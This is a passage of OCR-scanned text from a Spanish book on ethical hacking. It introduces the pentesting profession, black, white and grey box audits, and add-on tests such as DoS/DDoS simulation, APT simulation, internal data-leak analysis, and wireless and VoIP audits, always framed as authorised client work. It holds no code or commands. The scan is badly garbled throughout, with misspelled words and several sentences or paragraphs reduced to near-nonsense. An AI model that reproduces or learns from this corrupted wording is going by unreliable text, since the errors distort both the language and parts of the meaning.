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Introduccion 


Son  las  8.00  a.m.  de  un  lunes.  Comienza  una  semana  y  es  un  nuevo  dia  de  trabajo  para  dpentes^er, 
niiembro  importante  del  ecjiiipo  de  profesionales  cjue  realiza  los  trabajos  auditoria  de  segui  idad.  y  C]ue 
actualmente  esta  involucrado  en  un  nuevo  trabajo.  El  proyecto  ha  sido  contratado  por  una  empresa 
y  con  el  se  pretende  mostrar  a  toda  la  direccion  de  la  compania  el  stains  actual  de  la  seguridad  de 
la  compania  frente  a  todas  las  amenazas  que  existen  hoy  en  dia  en  Internet,  centrando  sus  esfuerzos 
tanto  en  el  factor  humano  como  en  el  dimensionaniiento  y  configuracion  de  sus  sistemas. 

^•,Que  se  quiere  decir  con  esto?  Pues  esto  es  un  proyecto  habitual  de  hacking  eiico,  lo  que  hace  que 
el  ser  humano  que  forma  parte  del  equipo  se  sienta  especial,  dispuesto  a  dar  lo  mejor  de  si  para 
conseguir  entrar  lo  maximo  posible  en  los  sistemas  infonnaticos  del  objetivo,  a  realizai  esquemas 
de  ataque  basados  en  ingenieria  social,  a  realizar  exploiting  de  las  aplicaciones  con  las  que  alii  se 
encuentre,  a  investigar  a  todas  y  cada  una  de  las  personas  de  interes  de  la  empresa  bajo  auditoria 
para  conocer  sus  habitos,  su  cntonio,  su  vida  y  despuds  localizar  el  eiTor  en  el  tiempo  y  el  espacio 
que  le  permita  acceder  a  su  informacion  como  un  paso  mas  para  llegar  al  corazon  de  la  empresa. 

A  pesar  de  los  ahos  y  el  numero  de  veces  que  lo  ha  hecho,  aim  el  cosquilleo  al  realizar  otro  trabajo 
de  pentesting  es  comparado  al  mayor  de  los  placeres  para  el  ser  humano. 

Tras  conocerse  mas  dates  del  proyecto  y  su  alcance,  se  empiezan  a  construir  las  etapas  por  las  que 
va  a  ser  necesario  pasar.  El  jefe  de  proyecto  reparte  tareas  al  equipo  en  funcion  de  las  cualidades 
tecnicas,  sociales  y  humanas  de  cada  miembro  involucrado  en  este  proyecto  de  hacking  etico.  Las 
jornadas  asignadas  a  cada  accion  seran  la  guia  del  proyecto.  siempre  acompahado  del  beneficio  el 
trabajo,  que  esto  sigue  siendo  el  objetivo  final  de  la  empresa,  monetizar  los  proyectos  que  real  ice  el 
equipo  de  auditoria. 

Son  diferentes  etapas,  varias  jornadas,  un  equipo,  y  comienza  el  proyecto,  comienza  el  juego.  el 
objetivo  final  do  cdi&di  pentester  no  es  tomar  una  toto  de  estado  de  la  seguridad  de  la  empiesa,  sino 
demostrar  que  se  puede.  Todos  saben  que  un  100%  de  seguridad  es  un  Into  aspiracional,  pero  no 
realista,  asi  que  cuando  comienza  un  proyecto  hay  que  llegar  hasta  el  final. 

El  hacking  etico  es  una  disciplina  profesional  dentro  del  campo  de  la  seguridad  intormatica  que 
pennite  evaluar  cl  nivel  de  vulnerabilidad  y  el  riego  en  el  que  se  encuentran  los  sistemas  infonnaticos 
0  los  activos  de  una  organizacion  mediante  un  acuerdo  previo  con  el  cliente. 

La  denotacion  de  estos  profesionales  como  hackers  eticos  ha  sido  impuesto  en  la  sociedad  para 
diferenciar  un  comportamiento  etico  hecho  por  un  profesional  de  acciones  ilegales  no  autorizadas 
realizas  por  alguien  con  peores  intenciones. 
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Esto  se  ha  iinpuesto  en  este  campo  debido  al  mal  uso  realizado  por  medios  de  coinunicacion 
inicialmente  y  otros  entes  de  la  sociedad  sobre  cl  termino  hacker,  lo  cual  ha  desembocado  en  que  se 
identifique  a  un  hacker  con  ii  delincuente  que  aprovecha  sus  conocimienlos  para  reahzar  acciones 
maliciosas  sobre  sistemas  con  el  fin  de  obtener  un  beneficio.  Esto  no  es  as!  realmente. 

Un  auditor  de  segtiridad  puede  realizar  proyectos  de  hacking  etico  a  distintas  organizaciones  que 
as!  lo  soliciten.  Realizar  una  de  estas  pruebas  puede  ir  desde  una  auditoria  a  un  sitio  web  hasta  una 
prueba  de  stress  contra  los  servidores  de  la  organizacion.  Exislen  algunas  pruebas  mas  vistosas  que 
otras,  pero  el  objetivo  que  se  marca  el  libro  es  presentar  e  identificar  acciones  que  se  pueden  repetir 
durante  las  distintas  pruebas. 

Las  pruebas  llevadas  a  cabo  en  un  proceso  de  auditoria  son  muy  dispares,  pero  a  lo  largo  de  los  anos 
uno  va  ejerciendo  en  distintos  ambitos  y  realizando  una  serie  de  pruebas  de  manera  procedimental. 
Estos  procedimientos  son  los  que  se  recopilan  en  este  libro,  aunque  en  muchas  ocasiones  la 
experieiicia  y  conocimiento  ayude  a  Ilcgar  al  exito. 

Las  auditorias  son  clasificadas  en  tres  tipos  como  son  la  caja  blanca,  caja  negra  y  caja  gris.  Este 
tipo  de  clasificacion  permite  identificar  el  ambito  y  contexto  de  actuacion.  Es  cieito  que  hoy  en  dia 
hay  mcls  y  mas  entidades  auditables,  es  decir,  tecnologia  que  debe  ser  evaluada  y  de  algiin  modo 
tbrtificada. 

En  el  presente  libro  se  muestran  diversas  pruebas,  no  tan  comtincs.  que  torman  parte  de  un  proyecto 
de  hacking  etico  como  puede  ser  la  simulacion  de  un  AFT,  Advanced  Persistent  Threat,  una  prueba 
de  DDOS,  Distributed  Denial  of  Service,  o  la  simidacion  de  tuga  de  informacion  de  la  organizacion 
hacia  el  exterior  con  el  rol  de  un  empleado  concreto  de  la  organizacion  que  pueda  tener  acceso  a 
datos  sensibles  de  la  compania. 

La  importancia  del  rol  en  este  tipo  de  escenarios  es  vital  para  entender  tanto  la  motivacion  como  las 
necesidades  de  un  aiacante.  Gracias  al  rol,  el  auditor  puede  situarse  en  el  contexto  de  la  organizacion 
y  evaluar  hasta  donde  se  puede  llegar  en  el  camino  a  los  activos  importantes  que  la  empresa  debe 
proleger. 

Las  empresas  cada  vez  son  mas  complejas  como  puede  entendersc  de  la  necesidad  de  realizar  esta 
serie  de  pruebas.  Cada  dia  se  maneja  mayor  volumen  de  informacion  y  esta  debe  ser  piotegida  de 
manera  activa.  La  idea  de  acercarse  a  un  pentesting  continuo  cobra  vida  desde  hace  iiempo  en  las 
empresas,  aunque  los  elevados  costes  de  un  equipo  humano  dedicado  a  ello  hacen  que  las  empresas 
no  puedan  realizar  auditorias  plenas  en  un  rango  temporal  pequefio. 

Por  otro  lado,  cada  dia  van  apareciendo  un  numero  mayor  de  incidentes  de  segtiridad.  no  solo  en 
pequeiias  sino  en  grandes  organizaciones.  Desde  hace  unos  meses.  todos  los  dias  nos  levantamos  con 
algun  nuevo  incidente  de  segtiridad  que  ha  desembocado  en  el  robo  de  los  datos  de  una  compania.  en 
errobo  de  las  identidades  de  los  emplcados  o  en  un  I'ratide  que  obliga  a  la  empresa  victima  a  realizar 
una  comtinicacion  con  sus  clientes  que  no  stiele  salirle  barata  en  tenninos  de  dano  rcputacional  y 
por  tanto  en  tenninos  economios. 


Introdiiccian 


Esto  de  nuevo  pone  encima  de  la  mesa  el  debate  sobre  el  estado  de  la  segtiridad  de  las  empresas 
hoy  en  dia  y  la  importancia  que  va  lomando  en  el  contexto  de  la  sociedad  el  contar  con  sistemas 
informaticos  lo  mas  seguro  posible,  y  entre  todas  las  tareas  que  ayiidan  a  mejorar  la  seguridad  de  una 
empresas,  un  proceso  de  hacking  etico  es  fundamental. 

Este  libro  pretende  contarte  muchas  cosas  que  puedan  aytidarte  a  realizar  tin  proceso  de  hacking 
etico.  No  estan  todas  las  cosas  que  puedes  encontrarte  en  un  proyecto,  y  tendras  que  adaptarte. 
Tendras  que  estudiar,  investigar,  planificar  y  desarrollar  ntievas  habilidades.  Eso  hace  apasionante 
este  trabajo.  Este  libro  te  aytidara  a  mostrarte  un  poco  del  camino,  pero  tendras  que  descubrirlo  tii 
solo  con  tu  experieiicia  y  andarlo  hasta  el  final.  Hasta  el  Owned  final. 


Caphulo  1.  Ethical  Hacking 


Capitulo  I 
Ethical  Hacking 


l.Objetivos 

El  principal  objetivo  de  iina  empresa  es  generar  beneficios  mediante  la  produccion  de  productos  o 
servicios  que  pennitan  a  la  empresa  seguir  ejerciendo  su  actividad.  Uno  de  los  peligros  qiie  acechan 
a  las  empresas  hoy  en  dia  es  Internet.  Este  medio  permite  hoy  en  dia  realizar  toda  accion  que  se 
pudiera  llevar  a  cabo  anteriormente  per  otra  via.  como  por  ejemplo,  la  realizacion  de  compras, 
negocios,  venta  de  activos,  consultas  de  infonnacion,  modificacion  de  nominas,  etcetera.  En  otras 
palabras,  acciones  criticas  son  realizadas  diariamente  por  las  empresas  a  traves  de  dicho  medio, 
por  lo  que  sus  propios  activos  pueden  quedar  expuestos  sin  una  correcta  politica  de  seguridad 
empresarial  y  sin  la  configuracion  de  los  elementos  adecuados  para  protegerse. 

El  objetivo  principal  de  un  proceso  de  Ethical  Hacking  o  Hacking  Etico  es  el  de  realizar  una  serie  de 
pruebas  acordadas  con  el  cliente,  la  empresa  u  organizacion  objeto,  con  el  fin  de  averiguar  fallos  de 
seguridad  en  algun  ambito  que  pueda  afectar  a  la  empresa  y  a  la  produccion  de  esta. 

Uno  de  los  objetivos  primordiales  de  toda  empresa  es  la  de  proteger  sii  infonnacion  critica  o  sensible 
y  llevar  a  cabo  el  cumplimiento  de  la  legislacion  vigente  entomo  a  proteccion  de  datos.  Por  esta 
razon  es  importante  para  una  empresa  detectar  y  eliminar  ciianto  antes  las  posibles  vulnerabilidades 
que  exisian  en  su  infraestructura,  ya  que  si  no  las  encuentran  los  auditores  lo  haran  los  usuarios 
maliciosos.  con  todo  el  riesgo  que  ello  conlleva. 

En  lineas  generales,  el  objetivo  fundamental  de  un  proceso  de  Ethical  Hacking  es  la  de  detectar, 
invesligary  e.Kplotar  las  vulnerabilidades  existentes  en  un  sistema  de  interes.  Es  importante  recalcar 
lo  de  interes,  ya  que  si  la  infonnacion  que  contiene  ese  sistema  es  menos  valiosa  que  el  tiempo  que 
llevaria  a  un  hacker  acceder  a  ella,  nadie  la  querria. 

El  pentesting  llevado  a  cabo  en  un  proceso  de  Ethical  Hacking  verificara  y  evaluara  la  seguridad, 
tanto  tTsica  como  logica,  de  la  red  donde  se  encuentran  los  sistemas,  de  los  propios  sistemas  de 
informacion,  de  la  configuracion  de  los  servidores,  de  las  bases  de  datos,  de  las  aplicaciones,  de  los 
elementos  para  mitigar  el  impacto  de  las  amenazas,  e  incluso  de  la  concienciacion  de  los  empleados 
encargados  de  la  productividad  empresarial. 
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Una  vez  que  se  ha  detectado  una  vulnerabilidad  y  se  ha  demostrado  que  un  sistema  es  vulnerable 
la  empresa  puede  tomar  medidas  preventivas  para  contrarrestar  posibles  ataqiies  ^ 

Y  seauramente  el  auditor  de  seguridad  acaba  de  ahonar  una  gran  cantidad  de  dinero,  ya  que  se 
podrlan  producir  danos  a  los  activos  mas  importantes,  como  puede 
imaaen  corporativa.  Hay  que  anotar  que  en  cualquier  memento  del  proceso  de  Ethical 
actividad  debe  estar  controlada,  es  decir,  todo  ataque  debe  poder  ser  parade  en  cualquiei  i  ^ 
ante  la  demanda  del  contratante.  ^Por  que  se  debe  actuar  come  la 

pregunta  tiene  una  seneilla  respuesta  y  es  un  dicho  amphamente  ditund.do  en  el  mundo  de 
seguridad:  “Para  atrapar  a  un  intruso,  primero  se  debe  pensar  como  un  intruso  . 

iQuienes  son  los  encargados  de  llevar  a  cabo  este  tipo  de  procesos?  Los 

eticos  son  tambien  conocidos  como  penlester,  y  son  los  encarga  os  e  i  -  ,e„,,,.idad 

penetracion  o  intrusion  a  los  sistemas.  Un  hacker  etico  es  un  experto  en  el  campo  de  > 

Liendo  altos  conocimientos  en  sistemas  y  redes  de  datos.  Su  principal  funcion  es  la  de  atacar  los 
sistemas  realizando  las  pruebas  que  se  iran  estudiando  en  este  hbro,  hacieiidolo  en  nombie  de  su 
clientes,  siempre  y  cuando  ataquen  activos  de  estos.  No  hay  diferencias  importantes  entie  un  hackei 
y  un  hacker  etico,  ambos  utilizaran  sus  conocimientos  para  lograr  sus  fines. 

Como  nota  anecdotica  explicar  que  en  el  mundo  de  la  seguiidad  infoimatica  se  suele  denomina 
hackers  de  sombrero  bianco  a  los  hackers  eticos,  este  hecho  es  debido  a  que  en  as  pe  icu 
oeste,  el  “bueno”  siempre  llevaba  un  sombrero  bianco  y  el  “malo”  un  sombrero  negro. 

En  definitiva,  para  garantizar  la  seguridad  de  la  informacion  se  necesita  un  conjunto  de  sistemas  o 
dlositwos.  tLi  y  hdi-ramientas  dastinadas  a  la  proKccidn  de  dicha  ,„fo,  m.c,on.  La  rama  de 
la  leeuridad  que  evaluara  mcdiaiite  la  ulillzacidn  de  uiia  metodologia  y  la  realieacion  de  piue  as 
ps;„Leales  es  el  Elhical  Co™  se  ,erS  mas  adelaute  esias  pruebas  van  desde  aiaque 

£Los,  Inlemos,  OOP  pri.ilegios,  medlanle  iugeuierl.  soeial.  a.aques  disrriburdos 
una  hotnet,  basandosc  en  exploits,  etcetera.  En  otras  palabras  cualquier  accion  o  metodo  es  va  o 
un  proceso  de  Ethical  Hacking  siempre  y  cuando  haya  sido  contratado  por  el  cliente,  no  sea  ilegal  y 
no  se  pierda  el  control  sobre  los  activos  a  auditai. 


l.Tipos  de  auditoria 

En  este  apartado  se  exponen  las  clasicas  divisiones  que  historicamente  se  ban  ido  realizando  sobre 
fos  tiiTos  de  auditoria.  Realmente  son  la  base  de  un  proceso  de  Ethical  Hacking  pero  no  son  las 
unicas  pruebas  que  se  realizan.  Mas  adelante  se  puede  ver  los  agregados  al  pioceso,  en  el  que  se 
especifican  pruebas  muy  interesaiiles,  novedosas  en  algunos  casos  y  que  contormai  un  proceso 
Ethical  Hacking  complelo. 

Hay  que  tener  en  cuenta  que  el  objetivo  de  una  auditoria  de  seguridad  es  el  de  generar 
seguridad.  Lo  mismo  ocurre  en  un  proceso  de  Ethical  Hacking,  ya  que  este  proceso  puede  alberta 
distintos  tipos  de  auditoria  de  seguridad,  como  se  vera  a  continuacion: 
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-  Auditoria  de  caja  negra. 

-  Auditoria  de  caja  blanca. 

-  Auditoria  de  caja  gris. 

La  auditoria  de  caja  negra  permite  al  auditor  tomar  el  rol  de  un  hacker,  el  cual  no  conoce  ninguna 
caracteristica  del  interior  de  la  empresa  o  la  organizacion.  En  otras  palabras,  la  vision  global  del 
sistema  es  ciega,  ya  que  no  se  conoce  como  se  organiza  interiormente  los  sistemas  y  redes.  El  auditor 
se  encargara  de  recopilar  todo  tipo  de  informacion  sobre  el  objetivo,  esta  informacion  es  publica  y 
despues  ira  tomando  contacto  con  los  sistemas  y  servicios  publicos  de  la  empresa  objeto. 

Estas  dos  fases  se  suelen  denominar /oo/;;/7/7///7g  a  la  recopilacion  de  informacion  publica  sobre  el 
objetivo  y  fingerprinting  a  la  fase  de  enumeracion  e  interaccion  con  los  sistemas  y  servicios  publicos 
descubiertos,  Esta  interaccion  permitira  al  hacker  estiidiar  vias  de  ataque  y  poder  tener  una  pequefia 
idea  del  ente  al  que  se  enfrenta. 

La  auditoria  do  caja  blanca  se  enfoca  en  el  rol  de  un  usuario  inlerno  de  la  organizacion  o  empresa, 
el  dial  dispone  de  acceso  a  los  sistemas  internos  o  a  la  totalidad  o  parte  de  los  datos  criticos  de  esta. 

En  este  tipo  de  auditorias  se  revisan  configuraciones  de  sistemas,  politicas,  servicios  y  redes,  codigo 
de  aplicaciones,  con  el  fin  de  encontrar  puntos  criticos  que  permitan  a  los  ustiarios  con  cierto  grado 
de  priA'ilegios  obtener  acceso.  El  entorno  empresarial  puede  ser  un  esquema  complejo  y  foco  de 
\  iilncrabilidades  que  aunque  no  se  ven,  e.xisten.  Es  importante  la  realizacidn  deeste  tipo  de  auditorias 
para  comprobar  lo  que  un  usuario  con  ciertos  privilegios  puede  llegar  a  lograr. 

Existen  ciertas  herramientas  que  pueden  aportar  una  vision  completa  de  los  sistemas,  y  que  permiten 
automatizar  la  auditoria.  Hay  que  recordar  que  en  un  proceso  de  Ethical  Hacking  lo  ideal  es 
aulomatizar  lo  posible,  sin  perder  el  control  sobre  lo  que  sc  e.sta  realizando  y  realizar  manualmcnlc 
lo  que  se  considere  importante  detectar,  y  posteriormente,  explotar. 

La  auditoria  de  caja  gris  permite  al  atacante  tomar  el  rol  de  un  cliente.  un  empleado  con  pocos  o 
ningiin  privilegio,  un  empleado  de  una  ubicacion  concreta,  por  ejemplo  un  empleado  de  finanzas.  El 
auditor  dispone  de  una  vision  "a  medias’'  de  los  sistemas,  se  encuentra  dentro  de  la  empresa  pero  no 
dispone  del  mismo  nivel  de  acceso  que  en  la  caja  blanca.  Es  por  lo  tanto  un  empleado  descontento 
que  intenta  acceder  a  informacion  a  la  que  no  tiene  acceso,  simulando  el  ataque  inlerno  a  la  empresa. 

I 'll  ejemplo  .sencillo  seria  simular  un  empleado  del  area  de  desarrollo  que  quiere  acceder  a 
informacion  almacenada  en  un  servidor.  a  la  cual  solo  tiene  acceso  un  administrador  del  dominio.  El 
empleado  intentara  conocer  la  infraestructura  interna,  aunque  puede  conocer  algo  de  ella,  e  intentara 
elevar  privilegios  robando  idenlidades  de  otros  companeros  hasta  lograr  su  objetivo. 

Como  se  ha  mencionado  anteriormente  estos  ties  tipos  dc  auditoria  se  encuentran  bien  diferenciados 
orienlados  o  giiiados  por  el  rol  que  se  toma  en  cada  caso.  Este  tipo  de  auditorias  disponen  dc  distintos 
tipos  de  pruebas  que  se  iran  tratando  a  lo  largo  del  libro. 
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3.  Agregados  al  proceso 

Hoy  en  dia  un  proceso  de  Ethical  Hacking  dispone  de  distintos  agregados,  aunque  su  raiz  son  los 
tres  tipos  de  auditoria  anteriormente  comentados.  Aunque  las  que  se  estudian  a  continuacion  no  son 
todas  las  pruebas  o  agregados  al  proceso,  son  las  mas  relevantes  y  utilizadas  en  estos  procesos. 


Pruebas  de  stress:  DOS/DDOS 

Este  agregado  es  una  de  las  pruebas  mas  temidas  por  las  empresas  y  grandes  corporaciones. 
Generalmente,  cuando  una  empresa  contrata  una  auditoria  intenta  evitar  esta  prueba,  ya  que  su 
fama  no  es  muy  grata.  Hay  que  bacer  hincapie  en  que  son  las  grandes  empresas,  como  bancos, 
consultoras,  operadoras  las  que  se  atreven  a  llevar  a  cabo  este  tipo  de  pruebas. 

Hay  que  tener  claro  que  son  pruebas  interesantes  para  estudiar  la  viabilidad  con  la  que  la  empresa 
puede  deiar  de  ofrecer  servicio.  Este  hecho  puede  ser  critico,  ya  que  si  la  produccion  de  esta  depende 
del  servicio  continuo  en  la  red,  habn'a  que  llevarla  a  cabo  con  el  maximo  cuidado  posible.  Muchos 
no  ven  con  buenos  ojos  estas  pruebas  precisamente  por  este  hecho,  pero  una  de  as  maximas  e 
Ethical  Hacking  dice  que:  “Si  no  se  prueba  de  manera  controlada.  habra  un  usuano  malicioso  que  lo 
hara”.  Con  esta  tVase  queda  claro  que  si  no  se  realiza,  no  quiere  decir  que  llegue  un  usuano  malicioso 
y  lo  provoque,  generando  perdida  de  servicio  y  posiblemente  de  dinero. 


Se  tiene  que  diferenciar  entre  pruebas  de  DOS,  Denial  Of  Service,  y  DDOS,  Distributed  Denial 
Of  Service  Una  prueba  de  DOS  intenta  sobrecargar  el  ancho  de  banda  de  un  equipo  mediante  la 
inundacion  de  la  red  de  paquetes  TCP/UDP.  Este  hecho,  bien  realizado,  dejara  maccesible  a  otras 
maquinas  al  servidor  o  al  target.  Por  otro  lado,  una  prueba  de  DDOS,  es  muy  similar  a  una  prue  a 
de  DOS,  salvo  que  el  origen  del  “bombardeo”  de  paquetes  y  conexiones  viene  de  cientos  o  mi  es 
de  maquinas  alrededor  de  maquinas,  y  en  el  caso  de  la  prueba  de  DOS  no.  Generalmente.  un  ataque 
DDOS  suele  realizarse  desde  una  red  de  equipos  zombies,  es  decir,  una  botnet.  Una  cosa  se  debe 
recordar  y  es  que  en  un  proceso  de  Ethicai  Hacking  para  una  empresa  u  orgamzacion  no  se  podra 
alquilar  ni  utilizar  una  botnet,  con  el  fin  de  cubrir  esta  prueba.  En  este  libro  se  estudiaran  algunos 
metodos  ingeniosos  para  llevar  a  cabo  la  prueba. 


e 


imposible  realizar  la  operacidn 


referenda: 
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Fig.  1.01 :  Ejempio  de  ser\'icio  no  disponible  cn  una  pmeba  dc  DDOS. 
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El  rol  que  se  toma  en  esta  pmeba  es  el  de  un  usuario  o  gmpo  de  usuarios  maliciosos,  los  cuales 
quieren  provocar  un  impacto  sobre  el  servicio  de  una  organizacion  con  el  fin  de  dejarla  inaccesible. 
De  esta  manera  pueden  provocar  dano  en  la  imagen  corporativa,  el  ciial  se  traduce  en  perdidas,  o 
incluso  cortar  la  produccion  de  su  actividad,  generando  inmediatamente  un  impacto  en  la  economia 
de  la  organizacion. 


APT:  Amenazas  avanzadas  persistentes 

Los  APT,  Advanced  Persistent  Threat,  es  un  agregado  al  proceso  bastante  novedoso.  Un  APT 
consiste  en  realizar  un  ataque  o  conjunto  de  ataques  sobre  una  muestra  de  personas  o  empleados 
de  una  empresa  simulando  un  ataque  dirigido  hacia  personas  de  interes.  En  otras  palabras,  el  rol 
del  auditor  es  la  de  una  persona  maliciosa  y  externa,  en  la  mayoria  de  las  ocasiones,  a  la  entidad  la 
cual  investigara  a  un  conjunto  de  empleados  averiguando  infonnacion  de  ellos  y  realizara  un  ataque 
para  lograr  obtener  el  control  de  la  maquina  o  dispositivo  de  estos,  lograr  sus  credenciales  teniendo 
acceso  a  infonnacion  bajo  su  identidad,  o  utilizandolos  para  llegar  a  otras  personas  de  mayor  interes. 

^•,Por  que  llevar  a  cabo  estas  pruebas?  Por  lo  general,  los  gmpos,  como  gobiernos,  personas  con  poder 
inediatico,  directives  de  empresas  grandes  e  importantes  se  encuentran  amenazados  en  Internet  por 
el  espionaje.  Existen  usuarios  maliciosos,  incluyendo  espionaje  entre  empresas,  entre  gobiemos  o 
paises,  los  cuales  quieren  utilizar  ciertas  tecnicas  de  recogida  de  infonnacion  para  acceder  a  dates 
.sensibles  de  sus  objetivos. 

Por  ejempio,  se  pueden  utilizar  medios  o  dispositivos  infectados.  comprometiendo  los  equipos  dc 
los  usuarios  a  los  que  se  amenaza,  ingenieria  social  para  conseguir  que  estos  usuarios  ejecuten 
ciertos  archives,  etcetera.  Generahnente,  un  solo  hacker  no  dispone  de  los  recursos  para  realizar  el 
ataque  tan  avanzado  y  persistente  como  pueden  hacerlo  los  gobiemos  o  entidades  grandes. 


Fuga  de  informadon  interna 

Esta  prueba  del  proceso  es  un  agregado  novedoso  en  cl  que  se  asume  el  rol  de  un  empleado.  el  cual 
a  priori  no  tiene  porque  disponer  de  privilegios.  Se  suele  denominar  a  la  prueba  como  analisis  de 
fuga  de  infonnacion  para  conseguir  detectar  canales  o  vectores  por  los  que  un  empleado  puede  sacar 
infonnacion  sensible  al  exterior  de  la  organizacion. 

A  priori,  la  prueba  puede  parecer  facil,  pero  en  un  entorno  critico  esto  se  puede  conveitir  en  una 
tarea  realmente  costosa.  El  objetivo  del  auditor  es  el  de  estudiar  distintos  tipos  de  vias,  que  no  dejen 
‘luiella''  y  por  los  que  pueda  recuperar  la  infonnacion  en  el  exterior.  Un  ejempio  sencillo  es  la 
posibilidad  de  asuinir  un  rol  de  un  empleado  de  finanzas,  el  cual  puede  querer  vender  infonnacion 
critica  de  la  organizacion,  pero  para  ello  debe  sacar  dicha  infonnacion  de  su  equipo.  No  dispone  de 
acceso  a  los  dispositivos  USB  o  extraibles,  ademas,  su  equipo  dispone  de  seguridad  tisica,  por  lo  que 
no  puede  abrir  el  equipo.  El  hombre  de  finanzas  debe  utilizar  un  medio  como  el  correo  electronico. 
pero  este  es  monitorizado  y  se  registra  todo  envio,  por  lo  que  seria  facilmente  rastreable.  Ademas. 
si  se  intenta  utilizar  cifrado  en  el  correo,  automaticamente  el  correo  sera  bloqueado,  y  se  le  pedira 
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explicaciones.  El  navegador  del  empleado  dispone  de  plugins  los  cuales  no  permiten  aiiadir  adjuntos 
a  los  coiTeos  webmail,  y  los  sitios  web  de  almacenamiento  en  la  nube  sc  encuentran  bloqueados  por 
proxy,  quedando  registrado  su  intento  de  acceso.  Como  se  vera  mas  adelante  este  tipo  de  pruebas, 
pueden  ser  mas  complejas  de  lo  que  se  puede  pensar. 


Comunicadones  wireless  &  VOIP 

Otro  de  los  agi'egados  al  proceso  de  Ethical  Hacking  es  el  conjunto  de  tecnicas  para  aiiditar  las 
comiinicaciones  de  la  organizacioii.  Generalmente,  una  organizacion  dispone  de  las  comunicaciones 
intemas  o  redes  de  datos,  donde  se  encuentran  las  DA'/Z,  la  Intranet,  y  otras  redes  suplementarias  de 
interes.  Aunque  hoy  en  dia  y  cada  vez  mas,  se  implantan  una  serie  de  redes  para  pemiitir  distintos 
tipos  de  comunicaciones,  como  son  las  comunicaciones  inalambricas  a  traves  de  las  redes  wireless, 
y  las  redes  de  voz,  con  la  implantacion  de  las  comunicaciones  VOJP,  Voice  Over  IP. 

En  el  proceso  de  auditar  las  comunicaciones  wireless  se  llevan  a  cabo  distintas  pmebas  con  el  fin 
de  detenninar  el  nivel  de  seguridad  y  confidencialidad  que  proporcionan  la  configuracion  de  dichas 
redes.  Es  altamcnte  probable  que  ocurran  anomalias  en  este  tipo  de  redes,  ya  que  se  suclen  implantar 
como  red  de  invitados  en  las  empresas,  por  lo  que  no  se  liene  en  ciienta  todo  el  impacto  que  puede 
tener  si  un  empleado,  no  tccnico,  utiliza  esa  red  para  realizar  su  labor.  Por  otro  lado,  se  suelen 
encontrar  cifrados  no  optimos  o  configuraciones  erroneas  en  las  redes  wireless  empresariales,  lo  ciial 
puede  desembocar  en  una  via  de  entrada  a  la  organizacion  o  la  infbrmacion  de  esta. 

En  el  proceso  para  auditar  las  comunicaciones  VOIP  se  llevan  a  cabo  distintas  pruebas,  donde  el 
auditor  asumira  el  rol  de  empleado  con  un  dispositive  VOIP  a  su  disposicion.  El  auditor  se  conectara 
la  red  de  voz  donde  realizara  la  auditoria.  El  objelivo  es  verificar  una  serie  de  pautas  para  evaluar 
el  status  de  seguridad  de  la  arquitectura  e  infraestructura  de  la  red.  Estas  pruebas  identificaran 
servidores,  tenninales  y  realizaran  pruebas  para  verificar  la  configuracion  general  de  los  terminales 
de  los  empleados.  Una  priieba  que  puede  provocar  la  deteccion  de  una  talla  importante  de  seguridad 
es  la  reconstruccion  de  paquetes,  pudiendo  obtener  la  conversacion  entre  dos  empleados,  dejando  a 
la  luz  un  fallo  de  seguridad  de  confidencialidad  grave. 


La  importancia  del  rol 

Un  proceso  de  Ethical  Hacking  esta  guiado  por  el  rol  que  los  auditores  van  tomando  en  cada 
actividad  que  se  va  realizando.  Como  se  ha  podido  estudiar  en  el  apartado  de  auditorias  o  en  los 
apartados  anteriores,  cl  auditor  va  asumiendo  distintos  roles  que  simulan  ser  usuarios  o  empleados 
en  un  instanle  concreto  y  con  circunstancias  concretas.  Es  por  este  hecho  que  se  dice  que  el  proceso 
viene  guiado  por  el  rol,  y  por  ello  este  dispone  de  tanta  impoilancia. 

Es  realmente  interesante  anunciar  en  el  apartado  de  documcntacion  o  infonnes  que  rol  se  ha  asumido 
en  cada  actividad  realizada.  De  este  modo,  no  sera  relevante  si  quien  visualiza  la  documentacion  o 
informe  no  dispone  de  conocimientos,  ya  que  podra  entender  mediante  el  rol  porque  se  ha  realizado 
la  prueba  y  que  se  estaba  simulando  en  cada  instante. 
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4.  Evaluacion  de  seguridad 

El  objetivo  final  de  un  proceso  de  Ethical  Hacking  es  el  de  evaluar  la  seguridad  de  los  sistemas, 
comunicaciones,  infraestructuras  de  las  que  dispone  la  organizacion  o  empresa.  En  toda  actividad 
que  se  realice  en  el  proceso,  ya  sea  una  auditoria  interna,  un  APT  o  una  auditoria  perimctral,  es 
necesario,  no  solo  planificar  y  llevar  a  cabo  las  actividades  sino  efectuar  procedi mientos  de  control 
y  de  contramedida. 

En  otras  palabras,  hay  que  llevar  a  cabo  la  parte  de  intrusion  y  pruebas  de  seguridad,  y  por  otro 
lado  preparar  las  contramedidas  y  procedimientos  que  seran  llevados  a  cabo  en  caso  de  detectar  y 
explotar  vulnerabilidades.  La  suma  de  ambas  partes  constituye  una  evaluacion  de  seguridad  global, 
que  es  realmente  la  que  el  cliente  contrata  y  espera. 


Vulnerabilidades 

Un  proceso  de  Ethical  Hacking  esta  compuesto,  como  se  ha  podido  entender  ya  con  anterioridad, 
por  diversas  pruebas  con  distintos  enfoques,  roles  y  ambitos.  Cualquier  de  estas  pruebas  tienen  como 
objetivo  comiin  encontrar  las  vulnerabilidades  que  puedan  afectar  en  mayor  o  menor  medida  a  los 
bienes  y  activos  de  la  empresa  u  organizacion.  Se  puede  detenninar  por  lo  tanto  que  un  proceso 
de  Ethical  Hacking  esta  guiado  por  la  busqueda  de  las  vulnerabilidades,  las  cuales  provoquen  la 
ejecucion  de  las  acciones  coirectoras,  con  el  fin  de  detectar  y  solucionar  los  agujeros  de  seguridad. 
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Fig.  1 .02:  GraHco  lareas  y  clasincacion  de  criticidad  do  vulnerabilidades. 


Todas  las  vulnerabilidades  no  son  iguales,  este  hecho  es  obvio.  Existen  ciertas  vulnerabilidades  que 
afectan  directamente  a  los  activos  o  bienes  de  la  empresa,  por  lo  que  su  deteccion  y  c.xplotacion 
puede  suponer  a  la  empresa  una  gran  perdida  economica.  Por  otro  lado  existen  las  vulnerabilidades 
importantes,  las  cuales  pueden  afectar  a  los  activos  de  la  empresa,  pero  no  de  maneradi recta.  Tambien 
existen  las  vulnerabilidades  meramente  infonnativas,  las  cuales  pueden  proporcionar  informacion  a 
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un  alacante,  la  ciial  puede  no  interesar  que  se  conozca  por  varies  motivos.  Este  tipo  de  clasificacion 
qiie  se  realiza  de  manera  orientativa  puede  provocar  que  el  auditor  caiga  en  un  eiTor  conceptual. 

Generalmente,  en  los  inforaies  que  se  realizan  en  el  mundo  profesional  de  la  seguridad  infomiatica, 
